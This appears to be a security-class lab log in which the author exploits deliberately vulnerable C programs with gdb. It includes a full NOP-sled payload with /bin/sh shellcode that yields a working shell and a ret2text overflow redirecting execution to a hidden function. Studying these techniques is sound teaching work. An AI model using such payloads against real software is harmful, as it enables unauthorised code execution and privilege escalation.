Now we can see everything is set up, I just need a shellcode at the end of my NOP sled (and to change the size of my NOP sled).


(gdb) r `perl -e 'print "A"x30 . "\x8c\xee\xff\xbf"'` `perl -e 'print "\x48\xf1\xff\xbf"'` `perl -e 'print "\x90"x969 . "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/admin/SecurityClass/Tutorial-06/6.2/vuln `perl -e 'print "A"x30 . "\x8c\xee\xff\xbf"'` `perl -e 'print "\x48\xf1\xff\xbf"'` `perl -e 'print "\x90"x969 . "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"'`

Breakpoint 1, 0x004011dd in f ()
(gdb) x/80xw $esp
0xbfffee84:     0x00404000      0xbfffeea8      0x0040128a      0xbfffef54
0xbfffee94:     0xbfffef54      0xbfffef68      0x00401277      0xbfffeec0
0xbfffeea4:     0x00000000      0x00000000      0xb7dff7e1      0xb7fb8000
0xbfffeeb4:     0xb7fb8000      0x00000000      0xb7dff7e1      0x00000004
0xbfffeec4:     0xbfffef54      0xbfffef68      0xbfffeee4      0x00000001
0xbfffeed4:     0x00000000      0xb7fb8000      0x00000000      0xb7fff000
0xbfffeee4:     0x00000000      0xb7fb8000      0xb7fb8000      0x00000000
0xbfffeef4:     0xfa3ddba0      0xba0f1db0      0x00000000      0x00000000
0xbfffef04:     0x00000000      0x00000004      0x004010a0      0x00000000
0xbfffef14:     0xb7feb450      0xb7fe62d0      0x00404000      0x00000004
0xbfffef24:     0x004010a0      0x00000000      0x004010d1      0x00401263
0xbfffef34:     0x00000004      0xbfffef54      0x004012d0      0x00401330
0xbfffef44:     0xb7fe62d0      0xbfffef4c      0x0000001c      0x00000004
0xbfffef54:     0xbffff0e6      0xbffff115      0xbffff138      0xbffff13d
0xbfffef64:     0x00000000      0xbffff53e      0xbffff54e      0xbffff59a
0xbfffef74:     0xbffff5a5      0xbffff5b8      0xbffff5d1      0xbffff60b
0xbfffef84:     0xbffff621      0xbffff62b      0xbffff659      0xbffff67a
0xbfffef94:     0xbffff68c      0xbffff69b      0xbffff6c9      0xbffff6d7
0xbfffefa4:     0xbffff6fc      0xbffff716      0xbffff72b      0xbffff73a
0xbfffefb4:     0xbffff75d      0xbffff78e      0xbffff797      0xbffff7a8
(gdb) c
Continuing.
p=bfffee5e       -- before 1st strcpy

Breakpoint 2, 0x0040121a in f ()
(gdb) x/80xw $esp
0xbfffee40:     0xbfffee5e      0xbffff115      0xb7fff000      0x004011e5
0xbfffee50:     0x00000000      0xbfffef54      0xb7fb8000      0x414169e0
0xbfffee60:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffee70:     0x41414141      0x41414141      0x41414141      0xbfffee8c
0xbfffee80:     0xb7fb8300      0x00404000      0xbfffeea8      0x0040128a
0xbfffee90:     0xbfffef54      0xbfffef54      0xbfffef68      0x00401277
0xbfffeea0:     0xbfffeec0      0x00000000      0x00000000      0xb7dff7e1
0xbfffeeb0:     0xb7fb8000      0xb7fb8000      0x00000000      0xb7dff7e1
0xbfffeec0:     0x00000004      0xbfffef54      0xbfffef68      0xbfffeee4
0xbfffeed0:     0x00000001      0x00000000      0xb7fb8000      0x00000000
0xbfffeee0:     0xb7fff000      0x00000000      0xb7fb8000      0xb7fb8000
0xbfffeef0:     0x00000000      0xfa3ddba0      0xba0f1db0      0x00000000
0xbfffef00:     0x00000000      0x00000000      0x00000004      0x004010a0
0xbfffef10:     0x00000000      0xb7feb450      0xb7fe62d0      0x00404000
0xbfffef20:     0x00000004      0x004010a0      0x00000000      0x004010d1
0xbfffef30:     0x00401263      0x00000004      0xbfffef54      0x004012d0
0xbfffef40:     0x00401330      0xb7fe62d0      0xbfffef4c      0x0000001c
0xbfffef50:     0x00000004      0xbffff0e6      0xbffff115      0xbffff138
0xbfffef60:     0xbffff13d      0x00000000      0xbffff53e      0xbffff54e
0xbfffef70:     0xbffff59a      0xbffff5a5      0xbffff5b8      0xbffff5d1
(gdb) c
Continuing.
p=bfffee8c       -- after 1st  strcpy

Breakpoint 3, 0x00401248 in f ()
(gdb) x/80xw $esp
0xbfffee40:     0xbfffee8c      0xbffff138      0x00000010      0x004011e5
0xbfffee50:     0x00000000      0xbfffef54      0xb7fb8000      0x414169e0
0xbfffee60:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffee70:     0x41414141      0x41414141      0x41414141      0xbfffee8c
0xbfffee80:     0xb7fb8300      0x00404000      0xbfffeea8      0xbffff148
0xbfffee90:     0x00000000      0x00000000      0x00000000      0x00401277
0xbfffeea0:     0xbfffeec0      0x00000000      0x00000000      0xb7dff7e1
0xbfffeeb0:     0xb7fb8000      0xb7fb8000      0x00000000      0xb7dff7e1
0xbfffeec0:     0x00000004      0xbfffef54      0xbfffef68      0xbfffeee4
0xbfffeed0:     0x00000001      0x00000000      0xb7fb8000      0x00000000
0xbfffeee0:     0xb7fff000      0x00000000      0xb7fb8000      0xb7fb8000
0xbfffeef0:     0x00000000      0xfa3ddba0      0xba0f1db0      0x00000000
0xbfffef00:     0x00000000      0x00000000      0x00000004      0x004010a0
0xbfffef10:     0x00000000      0xb7feb450      0xb7fe62d0      0x00404000
0xbfffef20:     0x00000004      0x004010a0      0x00000000      0x004010d1
0xbfffef30:     0x00401263      0x00000004      0xbfffef54      0x004012d0
0xbfffef40:     0x00401330      0xb7fe62d0      0xbfffef4c      0x0000001c
0xbfffef50:     0x00000004      0xbffff0e6      0xbffff115      0xbffff138
0xbfffef60:     0xbffff13d      0x00000000      0xbffff53e      0xbffff54e
0xbfffef70:     0xbffff59a      0xbffff5a5      0xbffff5b8      0xbffff5d1
(gdb) x/8xw 0xbffff148
0xbffff148:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff158:     0x90909090      0x90909090      0x90909090      0x90909090
(gdb) c
Continuing.
After second strcpy ;)
process 1656 is executing new program: /usr/bin/dash
Error in re-setting breakpoint 1: Function "f" not defined.
Inconsistency detected by ld.so: ../sysdeps/i386/dl-machine.h: 648: elf_machine_rel_relative: Assertion `ELF32_R_TYPE (reloc->r_info) == R_386_RELATIVE' failed!
[Inferior 1 (process 1656) exited with code 0177]
(gdb) 


There, we put it all together and it "works". Of course we were in gdb and so things can crash, let's restart gdb and see what happens.


(gdb) q
admin@kali:~/SecurityClass/Tutorial-06/6.2$ gdb -q vuln
Reading symbols from vuln...
(No debugging symbols found in vuln)
(gdb) r `perl -e 'print "A"x30 . "\x8c\xee\xff\xbf"'` `perl -e 'print "\x48\xf1\xff\xbf"'` `perl -e 'print "\x90"x969 . "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"'`
Starting program: /home/admin/SecurityClass/Tutorial-06/6.2/vuln `perl -e 'print "A"x30 . "\x8c\xee\xff\xbf"'` `perl -e 'print "\x48\xf1\xff\xbf"'` `perl -e 'print "\x90"x969 . "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"'`
p=bfffee5e       -- before 1st strcpy
p=bfffee8c       -- after 1st  strcpy
After second strcpy ;)
process 1663 is executing new program: /usr/bin/dash
$ ls
[Detaching after fork from child process 1670]
a.out  ex  ex.c  vuln  vuln.c  vuln2  vulnd
$ 


We have our shell working, now let's see if we can do this outside of gdb.


$ ls
[Detaching after fork from child process 1670]
a.out  ex  ex.c  vuln  vuln.c  vuln2  vulnd
$ exit
[Inferior 1 (process 1663) exited normally]
(gdb) q
admin@kali:~/SecurityClass/Tutorial-06/6.2$ ./vuln `perl -e 'print "A"x30 . "\x8c\xee\xff\xbf"'` `perl -e 'print "\x48\xf1\xff\xbf"'` `perl -e 'print "\x90"x969 . "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"'`
p=bfffeede       -- before 1st strcpy
p=bfffee8c       -- after 1st  strcpy
After second strcpy ;)
End of program
admin@kali:~/SecurityClass/Tutorial-06/6.2$


Looks like we didn't hit the right address with our changing of "p", but this is not a surprise. We can easily calculate the different between the addressed we saw in gdb and here thanks to the printing. Since we saw p=bfffee5e in gdb and p=bfffeede outside of gdb, we just need to change the value we over-write by the same offset:


admin@kali:~/SecurityClass/Tutorial-06/6.2$ ./vuln `perl -e 'print "A"x30 . "\x0c\xef\xff\xbf"'` `perl -e 'print "\x48\xf1\xff\xbf"'` `perl -e 'print "\x90"x969 . "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"'`
p=bfffeede       -- before 1st strcpy
p=bfffef0c       -- after 1st  strcpy
After second strcpy ;)
$ 




Notes for 6.3

Turn ASLR back on again.

admin@kali:~/SecurityClass/Tutorial-06/6.3$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
2
admin@kali:~/SecurityClass/Tutorial-06/6.3$ sudo cat /proc/sys/kernel/randomize_va_space
2
admin@kali:~/SecurityClass/Tutorial-06/6.3$ 


Look at ehwt we're about to work on.

admin@kali:~/SecurityClass/Tutorial-06/6.3$ cat ret2text.c 
#include "stdio.h"
#include "string.h"

void public(char *args) {
  char buff[12];
  strcpy(buff,args);
  printf("public\n");
}

void secret(void) {
  printf("secret function\n");
}

int main(int argc, char *argv[]) {
  if(getuid()==0) secret();
  else public(argv[1]);
  return 0;
}
admin@kali:~/SecurityClass/Tutorial-06/6.3$ gcc -o ret2text ret2text.c 
ret2text.c: In function ‘main’:
ret2text.c:15:6: warning: implicit declaration of function ‘getuid’ [-Wimplicit-function-declaration]
   15 |   if(getuid()==0) secret();
      |      ^~~~~~
admin@kali:~/SecurityClass/Tutorial-06/6.3$ ./ret2text AAAA
public
admin@kali:~/SecurityClass/Tutorial-06/6.3$ 


Let's explore with gdb and see if we can see how to exploit a flaw.

admin@kali:~/SecurityClass/Tutorial-06/6.3$ gdb -q ret2text
Reading symbols from ret2text...
(No debugging symbols found in ret2text)
(gdb) r AAAA
Starting program: /home/admin/SecurityClass/Tutorial-06/6.3/ret2text AAAA
public
[Inferior 1 (process 3352) exited normally]
(gdb) disass main
Dump of assembler code for function main:
   0x00401220 <+0>:     lea    0x4(%esp),%ecx
   0x00401224 <+4>:     and    $0xfffffff0,%esp
   0x00401227 <+7>:     pushl  -0x4(%ecx)
   0x0040122a <+10>:    push   %ebp
   0x0040122b <+11>:    mov    %esp,%ebp
   0x0040122d <+13>:    push   %esi
   0x0040122e <+14>:    push   %ebx
   0x0040122f <+15>:    push   %ecx
   0x00401230 <+16>:    sub    $0xc,%esp
   0x00401233 <+19>:    call   0x401275 <__x86.get_pc_thunk.ax>
   0x00401238 <+24>:    add    $0x2dc8,%eax
   0x0040123d <+29>:    mov    %ecx,%esi
   0x0040123f <+31>:    mov    %eax,%ebx
   0x00401241 <+33>:    call   0x401030 <getuid@plt>
   0x00401246 <+38>:    test   %eax,%eax
   0x00401248 <+40>:    jne    0x401251 <main+49>
   0x0040124a <+42>:    call   0x4011f5 <secret>
   0x0040124f <+47>:    jmp    0x401265 <main+69>
   0x00401251 <+49>:    mov    0x4(%esi),%eax
   0x00401254 <+52>:    add    $0x4,%eax
   0x00401257 <+55>:    mov    (%eax),%eax
   0x00401259 <+57>:    sub    $0xc,%esp
   0x0040125c <+60>:    push   %eax
   0x0040125d <+61>:    call   0x4011b9 <public>
   0x00401262 <+66>:    add    $0x10,%esp
   0x00401265 <+69>:    mov    $0x0,%eax
   0x0040126a <+74>:    lea    -0xc(%ebp),%esp
   0x0040126d <+77>:    pop    %ecx
   0x0040126e <+78>:    pop    %ebx
   0x0040126f <+79>:    pop    %esi
   0x00401270 <+80>:    pop    %ebp
   0x00401271 <+81>:    lea    -0x4(%ecx),%esp
   0x00401274 <+84>:    ret    
End of assembler dump.
(gdb) 


Note the address of the secret function is 0x4011f5. Also note the return address (store EIP) when we execute public is (0x00401262) and also we could consider using the address that jumps to the secret function (0x0040124a).

Let's put in some breaks and see what we see in the code we can access (public function)


(gdb) b public
Breakpoint 1 at 0x4011bd
(gdb) r `perl -e 'print "A"x4'`
Starting program: /home/admin/SecurityClass/Tutorial-06/6.3/ret2text `perl -e 'print "A"x4'`

Breakpoint 1, 0x004011bd in public ()
(gdb) disass public
Dump of assembler code for function public:
   0x004011b9 <+0>:     push   %ebp
   0x004011ba <+1>:     mov    %esp,%ebp
   0x004011bc <+3>:     push   %ebx
=> 0x004011bd <+4>:     sub    $0x14,%esp
   0x004011c0 <+7>:     call   0x4010c0 <__x86.get_pc_thunk.bx>
   0x004011c5 <+12>:    add    $0x2e3b,%ebx
   0x004011cb <+18>:    sub    $0x8,%esp
   0x004011ce <+21>:    pushl  0x8(%ebp)
   0x004011d1 <+24>:    lea    -0x14(%ebp),%eax
   0x004011d4 <+27>:    push   %eax
   0x004011d5 <+28>:    call   0x401040 <strcpy@plt>
   0x004011da <+33>:    add    $0x10,%esp
   0x004011dd <+36>:    sub    $0xc,%esp
   0x004011e0 <+39>:    lea    -0x1ff8(%ebx),%eax
   0x004011e6 <+45>:    push   %eax
   0x004011e7 <+46>:    call   0x401050 <puts@plt>
   0x004011ec <+51>:    add    $0x10,%esp
   0x004011ef <+54>:    nop
   0x004011f0 <+55>:    mov    -0x4(%ebp),%ebx
   0x004011f3 <+58>:    leave  
   0x004011f4 <+59>:    ret    
End of assembler dump.
(gdb) b *0x004011da
Breakpoint 2 at 0x4011da
(gdb) x/16xw $esp
0xbffff2a4:     0x00404000      0xbffff2d8      0x00401262      0xbffff535
0xbffff2b4:     0xbffff2f0      0xb7ea46cc      0x00401246      0x00000002
0xbffff2c4:     0xbffff384      0xbffff390      0xbffff2f0      0x00000000
0xbffff2d4:     0xb7fb8000      0x00000000      0xb7dff7e1      0xb7fb8000
(gdb) c
Continuing.

Breakpoint 2, 0x004011da in public ()
(gdb) x/16xw $esp
0xbffff280:     0xbffff294      0xbffff535      0xb7fb8000      0x004011c5
0xbffff290:     0x00000000      0x41414141      0xbffff200      0xb7fb8000
0xbffff2a0:     0xbffff2d8      0x00404000      0xbffff2d8      0x00401262
0xbffff2b0:     0xbffff535      0xbffff2f0      0xb7ea46cc      0x00401246
(gdb) x/1xw 0xbffff2ac
0xbffff2ac:     0x00401262
(gdb) 


As usual, we break inside the public function after the strcpy and see our string is now on the stack and further down we have the stored EIP.

Now we can adjust our string and put the value we want to jump to in here.

(gdb) r `perl -e 'print "A"x24 . "\xf5\x11\x40"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/admin/SecurityClass/Tutorial-06/6.3/ret2text `perl -e 'print "A"x24 . "\xf5\x11\x40"'`

Breakpoint 1, 0x004011bd in public ()
(gdb) c
Continuing.

Breakpoint 2, 0x004011da in public ()
(gdb) x/16xw $esp
0xbffff260:     0xbffff274      0xbffff51e      0xb7fb8000      0x004011c5
0xbffff270:     0x00000000      0x41414141      0x41414141      0x41414141
0xbffff280:     0x41414141      0x41414141      0x41414141      0x004011f5
0xbffff290:     0xbffff51e      0xbffff2d0      0xb7ea46cc      0x00401246
(gdb) c
Continuing.
public
secret function

Program received signal SIGSEGV, Segmentation fault.
0xbffff51e in ?? ()
(gdb) 


Now to complete this we need to run outside gdb and where the address space is randomized. 